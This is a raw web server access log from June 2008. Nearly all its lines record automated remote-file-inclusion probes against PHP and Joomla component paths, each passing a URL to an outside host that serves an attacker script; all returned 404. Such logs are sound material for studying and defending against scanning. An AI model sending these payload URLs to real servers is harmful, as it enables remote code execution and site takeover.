74.63.2.169 - - [30/Jun/2008:17:44:58 -0700] "GET /logs/access.log//main.php?appserv_root=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.63.2.169 - - [30/Jun/2008:17:44:58 -0700] "GET //main.php?appserv_root=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
89.255.60.210 - - [30/Jun/2008:17:45:01 -0700] "GET /logs/access_080531.log//postscript.php?p_mode=http://201.218.196.231/fastspread.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
89.255.60.210 - - [30/Jun/2008:17:45:01 -0700] "GET //postscript.php?p_mode=http://201.218.196.231/fastspread.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
89.255.60.210 - - [30/Jun/2008:17:45:02 -0700] "GET /logs//postscript.php?p_mode=http://201.218.196.231/fastspread.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.205.6.178 - - [30/Jun/2008:17:45:32 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
210.205.6.178 - - [30/Jun/2008:17:45:33 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:17:46:49 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:17:46:49 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:17:46:53 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
195.56.111.194 - - [30/Jun/2008:17:48:01 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
216.193.201.57 - - [30/Jun/2008:17:48:11 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.sojewels.com"
69.89.22.138 - - [30/Jun/2008:17:48:13 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.89.22.138 - - [30/Jun/2008:17:48:13 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.89.22.138 - - [30/Jun/2008:17:48:14 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
91.200.212.3 - - [30/Jun/2008:17:49:38 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.126.108.198 - - [30/Jun/2008:17:51:24 -0700] "GET /logs/access.log/convert/mvcw.php?vwar_root=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.126.108.198 - - [30/Jun/2008:17:51:28 -0700] "GET /convert/mvcw.php?vwar_root=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.126.108.198 - - [30/Jun/2008:17:51:28 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
67.15.70.45 - - [30/Jun/2008:17:52:13 -0700] "GET /print.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
67.15.70.45 - - [30/Jun/2008:17:52:13 -0700] "GET /print.php?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
209.51.219.170 - - [30/Jun/2008:17:54:38 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nintendowiispel.se/tmp/install_4575f0d08ceef/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
209.51.219.170 - - [30/Jun/2008:17:54:38 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nintendowiispel.se/tmp/install_4575f0d08ceef/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
209.51.219.170 - - [30/Jun/2008:17:54:38 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nintendowiispel.se/tmp/install_4575f0d08ceef/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
69.89.31.88 - - [30/Jun/2008:17:55:15 -0700] "GET /logs/access_080131.log/admin/spaw/spaw_control.class.php?spaw_root=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.89.31.88 - - [30/Jun/2008:17:55:15 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
195.56.111.194 - - [30/Jun/2008:17:55:44 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
195.56.111.194 - - [30/Jun/2008:17:55:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
74.6.22.156 - - [30/Jun/2008:17:56:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sojewels.com"
67.195.58.170 - - [30/Jun/2008:17:56:08 -0700] "GET /logs/ HTTP/1.0" 200 2495 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sojewels.com"
64.185.237.47 - - [30/Jun/2008:17:56:22 -0700] "GET /logs/access_080501.log//atom.php5?page=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
64.185.237.47 - - [30/Jun/2008:17:56:27 -0700] "GET //atom.php5?page=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:56:32 -0700] "GET /logs/access_080331.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
64.185.237.47 - - [30/Jun/2008:17:56:32 -0700] "GET /logs//atom.php5?page=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:56:32 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:56:33 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
91.200.212.3 - - [30/Jun/2008:17:57:21 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
91.200.212.3 - - [30/Jun/2008:17:57:21 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
87.101.4.42 - - [30/Jun/2008:17:58:10 -0700] "GET /logs/access_080131.log//index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
87.101.4.42 - - [30/Jun/2008:17:58:10 -0700] "GET //index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
87.101.4.42 - - [30/Jun/2008:17:58:10 -0700] "GET /logs//index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
189.19.255.240 - - [30/Jun/2008:17:58:11 -0700] "GET /logs/access_080531.log/print.php?page=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
189.19.255.240 - - [30/Jun/2008:17:58:13 -0700] "GET /print.php?page=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
189.19.255.240 - - [30/Jun/2008:17:58:14 -0700] "GET /logs/print.php?page=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
64.185.237.47 - - [30/Jun/2008:17:58:54 -0700] "GET /logs/access_080531.log//atom.php5?page=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
74.63.2.169 - - [30/Jun/2008:17:59:11 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.63.2.169 - - [30/Jun/2008:17:59:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.63.2.169 - - [30/Jun/2008:17:59:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
217.172.175.130 - - [30/Jun/2008:18:01:13 -0700] "GET /logs/access_080131.log//index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.sojewels.com"
217.172.175.130 - - [30/Jun/2008:18:01:13 -0700] "GET //index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.sojewels.com"
217.172.175.130 - - [30/Jun/2008:18:01:13 -0700] "GET /logs//index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:18:01:19 -0700] "GET /logs/access_080301.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
82.131.219.62 - - [30/Jun/2008:18:01:46 -0700] "GET /logs/access_080531.log/popup.php?path=http://www.cafelecaire.com/gallery/data/blid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
82.131.219.62 - - [30/Jun/2008:18:01:47 -0700] "GET /popup.php?path=http://www.cafelecaire.com/gallery/data/blid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
82.131.219.62 - - [30/Jun/2008:18:01:48 -0700] "GET /logs/popup.php?path=http://www.cafelecaire.com/gallery/data/blid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
216.193.201.57 - - [30/Jun/2008:18:06:34 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.sojewels.com"
216.193.201.57 - - [30/Jun/2008:18:06:34 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:18:06:46 -0700] "GET /logs/access_080531.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:18:11:22 -0700] "GET /logs/access_080531.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:18:12:04 -0700] "GET /logs/access_080531.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:18:12:52 -0700] "GET /logs/access_080531.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
77.74.196.90 - - [30/Jun/2008:18:13:26 -0700] "GET /logs/access_080301.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
77.74.196.90 - - [30/Jun/2008:18:13:27 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
77.74.196.90 - - [30/Jun/2008:18:13:27 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
77.74.196.90 - - [30/Jun/2008:18:13:32 -0700] "GET /logs/access_080531.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
200.126.108.198 - - [30/Jun/2008:18:16:29 -0700] "GET /logs/access_080531.log/convert/mvcw.php?vwar_root=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:18:17:46 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:18:17:46 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:18:17:46 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:18:19:53 -0700] "GET /logs/access_080331.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
67.15.70.45 - - [30/Jun/2008:18:23:15 -0700] "GET /logs/access_080531.log/print.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
67.15.70.45 - - [30/Jun/2008:18:23:15 -0700] "GET /logs/access_080531.log/print.php?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
67.15.70.45 - - [30/Jun/2008:18:23:15 -0700] "GET /logs/print.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
67.15.70.45 - - [30/Jun/2008:18:23:15 -0700] "GET /logs/print.php?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
189.19.255.240 - - [30/Jun/2008:18:23:29 -0700] "GET /logs/access_080501.log/index2.php?content=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
81.3.2.99 - - [30/Jun/2008:18:25:02 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
209.62.115.202 - - [30/Jun/2008:18:28:25 -0700] "GET /logs/access_080531.log/index.php?ort=http://www.geocities.com/alexmorris58/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
209.62.115.202 - - [30/Jun/2008:18:28:26 -0700] "GET /index.php?ort=http://www.geocities.com/alexmorris58/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
209.62.115.202 - - [30/Jun/2008:18:28:26 -0700] "GET /logs/index.php?ort=http://www.geocities.com/alexmorris58/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
209.62.115.202 - - [30/Jun/2008:18:28:26 -0700] "GET /logs/access_080531.log/index.php?ort=http://www.geocities.com/alexmorris58/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
209.62.115.202 - - [30/Jun/2008:18:28:27 -0700] "GET /index.php?ort=http://www.geocities.com/alexmorris58/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
209.62.115.202 - - [30/Jun/2008:18:28:27 -0700] "GET /logs/index.php?ort=http://www.geocities.com/alexmorris58/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
209.62.115.202 - - [30/Jun/2008:18:28:28 -0700] "GET /logs/access_080501.log/index.php?ort=http://www.geocities.com/alexmorris58/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
209.62.115.202 - - [30/Jun/2008:18:28:28 -0700] "GET /logs/access_080501.log/index.php?ort=http://www.geocities.com/alexmorris58/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:18:31:49 -0700] "GET /logs/access.log/contenido/includes/include.newsletter_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:18:31:49 -0700] "GET /contenido/includes/include.newsletter_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:18:31:50 -0700] "GET /logs/contenido/includes/include.newsletter_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
200.62.54.120 - - [30/Jun/2008:18:33:47 -0700] "GET /logs/config.php?path_to_root=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.62.54.120 - - [30/Jun/2008:18:33:47 -0700] "GET /config.php?path_to_root=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.62.54.120 - - [30/Jun/2008:18:33:47 -0700] "GET /logs/access_080331.log/config.php?path_to_root=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.62.54.120 - - [30/Jun/2008:18:33:53 -0700] "GET /logs/access_080501.log/config.php?path_to_root=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.53.39.34 - - [30/Jun/2008:18:37:06 -0700] "GET /logs/access.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
74.53.39.34 - - [30/Jun/2008:18:37:06 -0700] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
74.53.39.34 - - [30/Jun/2008:18:37:06 -0700] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
189.19.255.240 - - [30/Jun/2008:18:38:58 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
189.19.255.240 - - [30/Jun/2008:18:38:59 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
189.19.255.240 - - [30/Jun/2008:18:38:59 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:18:40:50 -0700] "GET /logs/access_080301.log/200http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:18:40:50 -0700] "GET /200http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:18:40:50 -0700] "GET /logs/200http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:18:40:50 -0700] "GET /logs/access_080331.log/200http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
189.19.255.240 - - [30/Jun/2008:18:43:33 -0700] "GET /logs/access.log/index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
189.19.255.240 - - [30/Jun/2008:18:43:34 -0700] "GET /index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
189.19.255.240 - - [30/Jun/2008:18:43:34 -0700] "GET /logs/index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
209.62.115.202 - - [30/Jun/2008:18:45:12 -0700] "GET /logs/access_080531.log/print.php?page=http://www.geocities.com/alexmorris58/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
